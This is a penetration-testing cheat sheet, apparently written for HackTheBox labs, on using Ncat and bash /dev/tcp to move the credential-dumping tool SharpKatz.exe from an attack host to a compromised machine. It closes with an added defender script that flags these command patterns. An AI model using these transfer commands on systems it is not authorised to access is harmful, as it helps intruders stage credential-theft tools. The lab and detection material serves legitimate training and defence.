Ncat File Transfer

Ncat is a modern reimplementation of Netcat produced by the Nmap Project. It supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

Note: On HackTheBox’s PwnBox, Ncat is available as nc, ncat, and netcat.

File Transfer Methods

Method 1: Compromised Machine Listening

Compromised machine (listening):

ncat -l -p 8000 --recv-only > SharpKatz.exe

With --recv-only, Ncat only receives data and sends nothing; the connection closes once the sender finishes the file transfer.

Attack host (sending):

ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

The --send-only flag, in either connect or listen mode, makes Ncat terminate once its input is exhausted. Normally Ncat keeps running until the network connection is closed, because the remote side may still transmit data. With --send-only, there is no further incoming data to wait for.

Method 2: Attack Host Listening

Attack host (listening):

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised machine (receiving):

ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Method 3: Using Bash /dev/tcp (No Ncat Required)

Attack host (listening):

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised machine (receiving via /dev/tcp):

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Common Options

  • -l: Listen mode
  • -p <port>: Specify port number
  • --send-only: Close connection once input is exhausted (sending side)
  • --recv-only: Only receive data, never send; the connection closes once the file transfer is finished (receiving side)
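
For defenders, the three methods above leave recognizable command lines. The following is an added example, not code from the original page: a POSIX shell sketch that labels logged command lines matching those patterns. The input format (one full shell command line per line), the label names, and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): label shell command lines that
# match the transfer patterns above. Input format is an assumption: one full
# command line per line, as recorded by shell command logging.

# Ncat may be invoked as ncat, nc or netcat, possibly with a path or sudo.
NC_RE='(^|[[:space:]/|;&])(ncat|nc|netcat)([[:space:]]|$)'
# bash opens a socket itself when a redirection targets /dev/tcp/<host>/<port>.
DEVTCP_RE='[<>][[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Print a label for one command line, or nothing when no pattern matches.
classify() {
    cmd=$1
    if printf '%s\n' "$cmd" | grep -Eq "$DEVTCP_RE"; then
        echo "bash-dev-tcp"
    elif printf '%s\n' "$cmd" | grep -Eq "$NC_RE"; then
        case " $cmd " in
            *" --recv-only "*) echo "ncat-recv-only" ;;
            *" --send-only "*) echo "ncat-send-only" ;;
            *" -l "*)          echo "ncat-listener" ;;
            *) : ;;  # plain client connections are not labelled here
        esac
    fi
}

# Read command lines on stdin; print "label<TAB>command" for each match.
scan() {
    while IFS= read -r line; do
        label=$(classify "$line")
        if [ -n "$label" ]; then printf '%s\t%s\n' "$label" "$line"; fi
    done
}

# Constructed sample: the page's five distinct commands plus benign lines.
sample_log() {
    cat <<'EOF'
ncat -l -p 8000 --recv-only > SharpKatz.exe
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
sudo ncat -l -p 443 --send-only < SharpKatz.exe
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
ls -l /dev/tty
rsync -a /srv/data backup:/srv/data
nc -zv 10.0.0.5 22
EOF
}

sample_log | scan
```

Process-creation telemetry (execve records) does not include shell redirections, and /dev/tcp is handled inside bash itself, so the output file name and the whole Method 3 command are visible only to shell-level command logging.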